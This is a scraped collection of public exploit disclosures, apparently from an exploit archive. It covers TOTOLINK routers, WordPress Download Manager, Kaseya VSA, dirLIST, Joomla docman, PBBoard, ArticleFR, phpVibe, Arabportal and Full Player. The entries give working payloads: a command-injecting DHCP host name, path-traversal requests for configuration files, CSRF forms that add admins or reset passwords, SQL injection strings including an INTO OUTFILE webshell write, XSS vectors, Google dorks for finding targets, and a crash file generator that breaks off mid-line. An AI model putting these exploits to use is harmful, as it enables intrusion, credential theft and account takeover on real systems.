Sending a DHCP request with this parameter will reboot the device:

cat /etc/dhcp/dhclient.conf

send host-name ";/sbin/reboot";

When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we
will see the stdout of the /dev/console device;
the dhcp request will immediately force the reboot of the remote device:


Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

[...]
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).

Launch iwcontrol: wlan0
Reaped 317
iwcontrol RUN OK
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
WAN0 IP: 192.168.2.1
signalling START
Invalid upnpd exit
killall: upnpd: no process killed
upnpd Restart 1
iptables: Bad rule (does a matching rule exist in that chain?)
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )
Update Session timestamp and try it after 5 seconds again.
ez_ipupdate callback --> time_elapsed: 0
Run DDNS by IP change:  / 192.168.2.1
Reaped 352
iptables: Bad rule (does a matching rule exist in that chain?)
Jan  1 00:00:25 miniupnpd[370]: Reloading rules from lease file
Jan  1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist
Jan  1 00:00:25 miniupnpd[370]: HTTP listening on port 2048
Reaped 363
Led Silent Callback
Turn ON All LED
Dynamic Channel Search for wlan0 is OFF
start_signal => plantynet_sync
Do start_signal => plantynet_sync
SIGNAL -> Config Update signal progress
killall: pppoe-relay: no process killed
SIGNAL -> WAN ip changed
Reaped 354
iptables: Bad rule (does a matching rule exist in that chain?)
ez_ipupdate callback --> time_elapsed: 1
Run DDNS by IP change:  / 192.168.2.1
Burst DDNS Registration is denied: iptime -> now:26
Led Silent Callback
Turn ON All LED
/proc/sys/net/ipv4/tcp_syn_retries: cannot create
- - - ---> Plantynet Event : 00000003
- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE


[sending the DHCP request]


[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan  1
00:01:03 miniupnpd[370]: received signal 15, good-bye
Reaped 392
Reaped 318
Reaped 314
Reaped 290
Reaped 288
Reaped 268
Reaped 370
Reaped 367
- - - ---> PLANTYNET_SYNC_FREE_DEVICE
Restarting system.

Booting...

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Reboot Result from Watchdog Timeout!

- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)
Delay 1 second till reset button
Magic Number: raw_nv 00000000
Check Firmware(05020000) : size: 0x001ddfc8 ---->


[...]


An attacker can use the /usr/bin/wget binary located in the file
system of the remote device to plant a backdoor and then execute it as
root.



## Vendor Response

Due to "un-ethical code" found in TOTOLINK products (= backdoors found
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this
case, but ipTIME was contacted in April 2015 concerning the first RCE.



## Report Timeline

* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in
ipTIME products.
* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.
* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.
* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and
EX750 routers.
* Jul 13, 2015: Updated firmwares confirmed vulnerable.
* Jul 16, 2015: A public advisory is sent to security mailing lists.



## Credit

These vulnerabilities were found by Alexandre Torres and Pierre Kim
(@PierreKimSec).



## References

https://pierrekim.github.io/advisories/2015-totolink-0x00.txt
https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html



## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/
HireHackking 
# WordPress Download Manager Free 2.7.94 & Pro 4 Authenticated Stored XSS

# Vendor Homepage: http://www.wpdownloadmanager.com
# Software Link: https://wordpress.org/plugins/download-manager
# Affected Versions: Free 2.7.94 & Pro 4
# Tested on: WordPress 4.2.2

# Discovered by Filippos Mastrogiannis
# Twitter: @filipposmastro
# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177

-- Description --

The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file:

Example: <svg onload=alert(0)>.jpg

The vulnerability exists because the file name is not properly sanitized 
and this can lead to malicious code injection that will be executed on the 
target’s browser.

-- Proof of Concept --

	
1. The attacker creates a new download package via the plugin's menu
and uploads a file with the name: <svg onload=alert(0)>.jpg 

2. The stored XSS can be triggered when an authenticated user (e.g. admin)
attempts to edit this download package

-- Solution --

Upgrade to the latest version
HireHackking 
>> Multiple vulnerabilities in Kaseya Virtual System Administrator 
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/)
==========================================================================
Disclosure: 13/07/2015 / Last updated: 28/09/2015 

>> Background on the affected product:
"Kaseya VSA is an integrated IT Systems Management platform that can be leveraged seamlessly across IT disciplines to streamline and automate your IT services. Kaseya VSA integrates key management capabilities into a single platform. Kaseya VSA makes your IT staff more productive, your services more reliable, your systems more secure, and your value easier to show."

A special thanks to CERT and ZDI for assisting with the vulnerability reporting process.
These vulnerabilities were disclosed by CERT under ID 919604 [1] on 13/07/2015.


>> Technical details:
#1
Vulnerability: Arbitary file download (authenticated)
CVE-2015-2862 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1

GET /vsaPres/web20/core/Downloader.ashx?displayName=whatever&filepath=../../boot.ini
Referer: http://10.0.0.3/

A valid login is needed, and the Referrer header must be included. A sample request can be obtained by downloading any file attached to any ticket, and then modifying it with the appropriate path traversal. 
This will download the C:\boot.ini file when Kaseya is installed in the default C:\Kaseya directory. The file download root is the WebPages directory (<Kaseya_Install_Dir>\WebPages\).


#2
Vulnerability: Open redirect (unauthenticated)
CVE-2015-2863 / CERT ID 919604
Affected versions: unknown, at least v7 to v9.1

a)
http://192.168.56.101/inc/supportLoad.asp?urlToLoad=http://www.google.com

b)
GET /vsaPres/Web20/core/LocalProxy.ashx?url=http://www.google.com
Host: www.google.com
(host header has to be spoofed to the target)


>> Fix: 
R9.1: install patch 9.1.0.4
R9.0: install patch 9.0.0.14
R8.0: install patch 8.0.0.18
V7.0: install patch 7.0.0.29


>> References:
[1] https://www.kb.cert.org/vuls/id/919604

================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
HireHackking 
source: https://www.securityfocus.com/bid/54933/info

dirLIST is prone to multiple local file-include vulnerabilities and an arbitrary-file upload vulnerability because the application fails to sufficiently sanitize user-supplied input.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information. 

http://www.example.com/dirlist_0.3.0/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../windows/win.ini
http://www.example.com/irlist_0.3.0/dirLIST_files/thumb_gen.php?image_path=../../../../../windows/win.ini
HireHackking 
# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"

# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 In title will occur Full Path Disclosure of server.
 
# Xploit (LFD/LFI):

 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
 Let's Xploit...
 
 First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
 
 ../../../../../../../target/www/configuration.php <= Not Ready
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !
 

And Now we have a configuration file...
HireHackking 
source: https://www.securityfocus.com/bid/54916/info
  
PBBoard is prone to multiple security vulnerabilities including:
  
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
  
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
  
PBBoard 2.1.4 is vulnerable; other versions may also be affected.


<form action="http://www.example.com/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main">
<input type="hidden" name="context" value='<? phpinfo(); ?>'>
<input type="submit" name="Submit" value="Send">
</form>
HireHackking 
source: https://www.securityfocus.com/bid/54916/info
 
PBBoard is prone to multiple security vulnerabilities including:
 
1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability
 
Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.
 
PBBoard 2.1.4 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1">
<input type="hidden" name="new_password" value="new_password">
<input type="submit" name="Submit" value="Send">
</form>
HireHackking 

ArticleFR 3.0.6 CSRF Add Admin Exploit


Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6

Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.

Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.

Tested on: nginx/1.6.2
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5248
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php


21.06.2015

--


<html>
  <body>
    <form action="http://127.0.0.1/dashboard/users/create/" method="POST">
      <input type="hidden" name="username" value="thricer" />
      <input type="hidden" name="name" value="The_Hacker" />
      <input type="hidden" name="password" value="s3cr3t" />
      <input type="hidden" name="email" value="lab@zeroscience.mk" />
      <input type="hidden" name="website" value="http://www.zeroscience.mk" />
      <input type="hidden" name="blog" value="zsl" />
      <input type="hidden" name="membership" value="admin" />
      <input type="hidden" name="isactive" value="active" />
      <input type="hidden" name="submit" value="Create" />
      <input type="submit" value="Request" />
    </form>
  </body>
</html>

##################################################################


ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities


Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6

Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.

Desc: ArticleFR suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via the
POST parameter 'name' in Categories, POST parameters 'title' and
'rel' in Links and GET parameter 'url' in PingServers module is
not properly sanitized before being returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.

Tested on: nginx/1.6.2
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5247
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php


21.06.2015

--


POST 'name' Categories Stored XSS:
----------------------------------
<html>
  <body>
    <form action="http://127.0.0.1/dashboard/settings/categories/" method="POST">
      <input type="hidden" name="name" value='"><script>alert(1)</script>' />
      <input type="hidden" name="parent" value="0" />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #1" />
    </form>
  </body>
</html>


POST 'title', 'rel' Links Stored XSS:
------------------------------------
<html>
  <body>
    <form action="http://127.0.0.1/dashboard/settings/links/" method="POST">
      <input type="hidden" name="title" value='"><script>alert(2)</script>' />
      <input type="hidden" name="url" value="http://www.zeroscience.mk" />
      <input type="hidden" name="rel" value='"><script>alert(3)</script>' />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #2 and #3" />
    </form>
  </body>
</html>


POST 'url' Ping Server Reflected XSS:
-------------------------------------
<html>
  <body>
    <form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST">
      <input type="hidden" name="url" value='http://www.zeroscience.mk"><script>alert(4)</script>' />
      <input type="hidden" name="submit" value="Add" />
      <input type="submit" value="XSS #4" />
    </form>
  </body>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/54916/info

PBBoard is prone to multiple security vulnerabilities including:

1. Multiple SQL-injection vulnerabilities
2. A security-bypass vulnerability
3. An arbitrary file upload vulnerability

Exploiting these issues could allow an attacker to carry out unauthorized actions on the underlying database, to gain access to various user accounts by changing account passwords, or to execute arbitrary script code on an affected computer in the context of the affected application.

PBBoard 2.1.4 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/index.php?id=1&member=1&page=send&start=1" method="post" name="main" id="main">
<input type="hidden" name="username" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=forget&send_active_code=1" method="post" name="main" id="main">
<input type="hidden" name="email" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=forum_archive&password_check=1&id=1" method="post" name="main" id="main">
<input type="hidden" name="password" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=management&move=1&subject_id=1" method="post" name="main" id="main">
<input type="hidden" name="section" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=managementreply&startdeleteposts=1&do_replys=1" method="post" name="main" id="main">
<input type="hidden" name="section_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="hidden" name="check[]" value="1">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=new_password&forget=1" method="post" name="main" id="main">
<input type="hidden" name="member_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">
<input type="hidden" name="new_password" value="1">
<input type="submit" name="Submit" value="Send">
</form>

<form action="http://www.example.com/index.php?page=tags&start=1" method="post" name="main" id="main">
<input type="hidden" name="subjectid" value="' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- ">
<input type="submit" name="Submit" value="Send">
</form>
HireHackking 
## In The Name Of ALLAH ##
# Exploit Title: phpVibe ALL versions LFD vulnerability
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1 


stream.php
====================================
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));

file parameter has no validation and sanitization!
exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed):

http://domain.tld/stream.php?file=../vibe_config.php@@media ==> http://domain.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09

=====================================
HireHackking 
## In The Name Of ALLAH ##
# title : Arabportal 3 SQL injection vulnerability
# Exploit Title: Arabportal 3 registeration section SQL injection vulnerability
# Google Dork: inurl:members.php?action=signup
# Date: 2015/07/10 (july 10th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: www.arabportal.net
# Software Link: www.arabportal.net
# Version: 3
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1 


members.php?action=singup

POST parameter "showemail" is vulnerable to error based SQLi attack

................................................................................

1' AND (SELECT 1212 FROM(SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.tables GROUP BY x)a) AND 'ali-ahmady'='ali-ahmady


video : https://youtu.be/5nFblYE90Vk

good luck
HireHackking 
#!/usr/bin/python

#[+] Author: SATHISH ARTHAR
#[+] Exploit Title:  Full Player 8.2.1 Memory Corruption PoC
#[+] Date: 13-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 
#[+] Vendor: http://www.fplayer.net
#[+] Download: http://www.fplayer.net/full_player.exe 
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks:   offensive security (@offsectraining)


 
import os
os.system("color 02")

print"###########################################################"
print"#  Title: Full Player-8.2.1 Memory Corruption PoC          #"
print"#  Author: SATHISH ARTHAR                                  #"
print"#  Category: DoS/PoC                                       # "
print"###########################################################"
	
crash=("\x4F\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x00\x00\x00\x00\xC7\x72\x7C\x6F\x01\x1E\x01\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x05\x99\xAC\x00\x00\xFD\xFF\xCF\xFC\x09\xFF\x99\x0F\xF9\x0F\x8F\x7F\xB9\x01\x4F\x67\x67\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x01\x00\x00\x00\x15\x5A\x7E\x0C\x11\x4A\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x58\x69\x70\x68\x2E\x4F\x72\x67\x20\x6C\x69\x62\x56\x6F\x72\x62\x69\x73\x20\x49\x20\x32\x30\x30\x32\x30\x37\x31\x37\x01\x00\x00\x00\x19\x00\x00\x00\x53\x6F\x6E\x79\x20\x4F\x67\x67\x20\x56\x6F\x72\x62\x69\x73\x20\x31\x2E\x30\x20\x46\x69\x6E\x61\x6C\x01\x05\x76\x6F\x72\x62\x69\x73\x29\x42\x43\x56\x01\x00\x08\x00\x00\x80\x22\x4C\x20\xC3\x80\xD0\x90\x55\x00\x00\x10\x00\x00\x80\xA8\x36\x14\x6B\xA9\xB1\xD6\x1A\x63\xA1\x28\x46\xD4\x62\x6A\x31\xC6\x18\x63\xE3\x2C\x46\x90\x62\x8B\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x20\x34\x64\x15\x00\x00\x04\x00\x40\x31\xEA\x15\x93\x9E\x42\xCC\x39\xE7\xDC\x18\xA6\x8D\x51\xDA\x29\xC7\x39\xE7\xDC\x18\xC5\x89\x30\x58\x21\xA5\xB9\xA5\x9A\x52\xCC\xA1\x93\x9C\x4A\xCA\x39\xE7\x1C\x08\x0D\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x4A\x29\xA5\x94\x62\x8A\x29\xA6\x98\x62\x8A\x29\xA6\x98\x72\xCC\x31\xC7\x1C\x83\x0C\x32\xE8\xA4\x93\x4E\x3A\xE9\x24\xA4\x90\x42\x09\xA5\xA4\x92\x52\x4A\xAD\xC5\x1A\x6B\xEF\xBD\xF7\x9E\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xCF\x39\x07\x42\x43\x56\x01\x00\x20\x00\x00\x04\x42\x06\x21\x84\x10\x42\x08\x21\x84\x14\x52\x48\x21\xA6\x98\x62\xCA\x29\xA7\x80\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x4B\xB1\x14\x4D\xD1\x1C\xCF\xF1\x1C\xCF\x11\x1D\x53\x12\x25\x53\x32\x25\x53\x72\x2D\xD7\x32\x2D\x53\x33\x3D\xD3\x33\x45\x55\x74\x55\x53\x55\x65\xD7\x75\x65\x53\x36\x65\x53\x36\x65\x55\x36\x65\x53\x36\x65\x53\x36\x65\xD5\x95\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x23\x29\x8E\xE2\x38\x8E\xE3\x48\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\x60\x28\x8A\xA3\x48\x8E\x24\x59\x92\x65\x59\x96\x67\x99\x9A\xE9\x99\x9E\x69\x9A\xA6\x69\x9A\xA6\x09\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xA0\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\xC7\x71\x1C\xC7\x71\x1C\xC7\x71\x1C\x47\x72\x24\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\x40\x52\x24\xC5\x72\x34\x47\x73\x34\xC7\x73\x3C\x47\x74\x44\x47\x94\x4C\x49\x95\x5C\x4B\xB6\x64\x0D\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x33\x2C\x43\x53\x3C\x47\xB3\x44\x4D\xD4\x44\x51\xF4\x44\x4F\x14\x45\xD1\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x80\xD0\x90\x55\x00\x00\x04\x00\x00\x01\x9D\x66\x98\x6A\x80\x08\x33\x92\x59\x20\x34\x64\x15\x00\x80\x00\x00\x00\x10\x81\x0C\x53\x0C\x08\x0D\x59\x05\x00\x00\x04\x00\x00\x48\x91\xE4\x24\x89\x92\x93\x52\x4A\x39\x0C\x92\xC5\x24\xA9\x94\x93\x52\x4A\x79\x14\x93\x47\x35\xC9\x18\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x0C\x92\xE5\x28\xA9\x94\x93\x52\x4A\x49\x8C\x92\xC5\x28\xA9\x52\x93\x52\x4A\x79\x94\x93\x27\x35\xC9\xD8\x93\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x59\x90\x92\x27\x2D\xE9\x1A\x94\x52\x4A\x49\x8E\x92\x06\x2D\xD9\xD4\x93\x52\x4A\x89\x52\x94\x28\x39\xD9\x9E\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\xF9\xA0\x94\x0F\x42\x29\xA5\x94\x52\x4A\xB9\xDA\x93\x6B\x3D\x29\xA5\x94\x52\x4A\x19\xA3\x94\xF0\x49\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\xCA\x08\x42\x43\x56\x01\x00\x40\x00\x00\x80\x71\xD6\x28\x87\xA2\x93\xE8\x7C\x71\x86\x72\xA6\x29\x48\x2A\x94\x26\x74\x6F\x92\xA3\xE4\x39\xC9\xAD\xB4\xDC\x9C\x6E\xC2\x39\xA7\x9B\x53\xCE\xF9\xE4\x9C\x73\x82\xD0\x90\x55\x00\x00\x20\x00\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x88\x21\x86\x18\x72\xC8\x29\xA7\xA0\x82\x0A\x2A\xA9\xA4\xA2\x8A\x2A\xAA\xAC\xB2\xCC\x32\xCB\x2C\xB3\xCC\x32\xCB\x2C\xB3\xCC\x32\xEB\xAC\xA3\x8E\x3A\x0B\x29\x84\x92\x42\x0B\xAD\xD5\x18\x6B\x8C\xB1\xD5\xDE\x9C\xB4\x35\x47\x29\x9D\x94\x52\x4A\x29\xA5\x94\xCE\x39\xE7\x9C\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19\x65\x14\x52\x88\x21\xA6\x9C\x72\xCA\x29\xA8\xA4\x92\x0A\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x10\x25\xD3\x31\x1D\xD1\x11\x15\xD1\x11\x1D\xD1\x11\x1D\xD1\x11\x1D\xCF\xF1\x1C\x4F\x12\x25\xD1\xF2\x2C\x51\x33\x3D\x53\x34\x4D\xD3\x55\x65\x57\x96\x75\xD9\x96\x6D\x57\x97\x75\x5B\x97\x7D\xDB\xB7\x75\xDB\xB6\x7D\xDD\xD8\x8D\xDF\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\x63\x08\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84\x14\x52\x48\x21\x85\x94\x62\x8A\x31\xE7\xA0\x83\x10\x42\x29\x81\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x45\x71\x14\xC7\x91\x1C\x49\x92\x24\x4B\xB2\x2C\xCD\xD2\x34\x4D\xD3\x34\x4F\xF4\x44\xCF\xF4\x54\xCF\x15\x65\xD1\x16\x6D\xCF\xF5\x6C\xD1\xF6\x5C\x4F\xF5\x54\x4F\x15\x55\x53\x35\x5D\xD3\x55\x5D\xD7\x75\x5D\xD5\x55\x65\x55\x76\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x22\x29\x92\x22\x39\x8E\x23\x39\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\xA0\x28\x8A\xE2\x38\x8E\xE4\x58\x92\x25\x69\x92\x28\x99\x96\x6A\xB9\x9A\xEC\xE9\x9E\x2E\xEA\xA2\x0E\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x60\x88\x86\x68\x88\x8E\x68\x89\x9A\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\x47\x72\x24\xC7\x52\x2C\x45\x52\x24\xC5\x72\x2C\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\xC0\x31\x1C\x43\x52\x24\xC7\xB2\x2C\x4B\xD3\x34\xCF\xF3\x3C\x4F\xF4\x44\x51\x14\x45\xD3\x54\x4D\x15\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x51\x14\xCB\xB1\x1C\x49\xD2\x1C\x4F\x12\x1D\x51\x12\x25\xD1\x12\x25\x51\x13\x35\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x81\xD0\x90\x95\x00\x00\x19\x00\x00\x03\xB1\xF5\xD4\x72\xEE\x8D\xA0\x48\x2A\x47\xB5\xC6\xD4\x51\xE6\x24\x06\x61\x1A\x8A\xA0\x82\x18\x84\x0C\x15\x44\x88\x51\x0E\x26\x62\x0A\x19\x26\x39\x97\x0C\x3A\xA6\x98\xD4\x18\x4B\x2A\x1D\x73\x52\x6B\x4B\x25\x54\x48\x41\x0C\x36\xA6\x52\x29\xE5\xA8\x07\x42\x43\x56\x08\x00\xA1\x19\x00\x0E\xC7\x01\x24\xCD\x02\x24\x4B\x03\x00\x00\x00\x00\x00\x00\x00\x49\xD3\x00\xCD\xF3\x00\xCD\xF3\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\xC0\xF2\x